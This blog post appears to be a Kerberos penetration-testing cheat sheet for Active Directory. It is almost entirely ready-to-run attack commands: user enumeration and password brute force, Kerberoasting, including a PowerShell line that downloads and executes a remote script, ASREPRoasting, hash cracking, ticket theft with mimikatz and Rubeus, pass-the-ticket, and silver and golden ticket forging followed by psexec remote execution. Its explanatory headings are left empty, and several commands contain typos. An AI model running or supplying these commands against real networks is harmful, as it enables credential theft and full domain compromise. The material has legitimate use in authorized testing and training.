Kerberos Penetration Testing
Posted in: Active Directory, Infrastructure

Kerberos Penetration Testing Fundamentals

Today I will write about Kerberos Penetration Testing, which Active Directory uses to manage authentication inside the environments.

How does Kerberos work?

Kerberos flows

Kerberos Components

  • KDC – Kerberos Distribution Center
  • Client – Client requesting access to a service
  • Service – service to allow when a ticket is requested

TGT – Ticket Granting Ticket

Kerberos Authentication

Enumeration

nmap --script krb5-enum-users --script-args krb5-enum-users.realm='rfs.local'-p 88 <target-ip>
kerbrute userenum --dc 10.0.0.1 -d example.domain usernames.txt
kerbture bruteuser --dc 10.0.0.1 -d example.domain passwords.txt username

Brute Force Kerberos

kerbrute bruteforce --dc 10.0.0.1 -d example.domain combos.txt

Kerberos Attacks

Kerberoasting

python GetUserSPNs.py <domain_name>/<domain_user>:<domain_user_password> -outputfile <output_TGSs_file>
.\Rubeus.exe kerberoast /outfile:<output_TGSs_file>
iex (new-object Net.WebClient).DownloadString("https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-Kerberoast.ps1")
Invoke-Kerberoast -OutputFormat <TGSs_format [hashcat | john]> | % { $_.Hash } | Out-File -Encoding ASCII <output_TGSs_file>

Crack the Hashes

hashcat -m 13100 --force <TGSs_file> <passwords_file>
john --format=krb5tgs --wordlist=<passwords_file> <AS_REP_responses_file>

ASREPRoast

Check ASREPRoast for all domain users (credentials required).

python GetNPUsers.py <domain_name>/<domain_user>:<domain_user_password> -request -format <AS_REP_responses_format [hashcat | john]> -outputfile <output_AS_REP_responses_file>

Check ASREPRoast for a list of users (no credentials required)

python GetNPUsers.py <domain_name>/ -usersfile <users_file> -format <AS_REP_responses_format [hashcat | john]> -outputfile <output_AS_REP_responses_file>

Pass The Ticket (PTT)

Harvest Tickets in Linux

grep default_ccache_name /etc/krb5.conf
cp tickey /tmp/tickey
/tmp/tickey -i

Harvest Tickets in Windows

mimikatz # sekurlsa::tickets /export
.\Rubeus dump

Convert Tickets

python ticket_converter.py ticket.kirbi ticket.ccache
python ticket_converter.py ticket.ccache ticket.kirbi

Overpass The Hash/Pass The Key (PTK)

python getTGT.py <domain_name>/<user_name> -hashes [lm_hash]:<ntlm_hash>
python getTGT.py <domain_name>/<user_name> -aesKey <aes_key>
python getTGT.py <domain_name>/<user_name>:[password]
export KRB5CCNAME=<TGT_ccache_file>
python psexec.py <domain_name>/<user_name>@<remote_hostname> -k -no-pass

Silver Tickets

python ticketer.py -nthash <ntlm_hash> -domain-sid <domain_sid> -domain <domain_name> -spn <service_spn>  <user_name>
python ticketer.py -aesKey <aes_key> -domain-sid <domain_sid> -domain <domain_name> -spn <service_spn>  <user_name>
export KRB5CCNAME=<TGS_ccache_file>
Execute remote command to use the TGT.
python psexec.py <domain_name>/<user_name>@<remote_hostname> -k -no-pass

Golder Tickets

python ticketer.py -nthash <krbtgt_ntlm_hash> -domain-sid <domain_sid> -domain <domain_name>  <user_name>
python ticketer.py -aesKey <aes_key> -domain-sid <domain_sid> -domain <domain_name>  <user_name>
export KRB5CCNAME=<TGS_ccache_file>
python psexec.py <domain_name>/<user_name>@<remote_hostname> -k -no-pass

What is an SPN?

Service Principal Name

What is a Ticket?

What type of tickets exists?

What is a silver ticket?

What is a Golden Ticket?

What is a skeleton key?

Leave a Reply Cancel reply

Back to Top
Index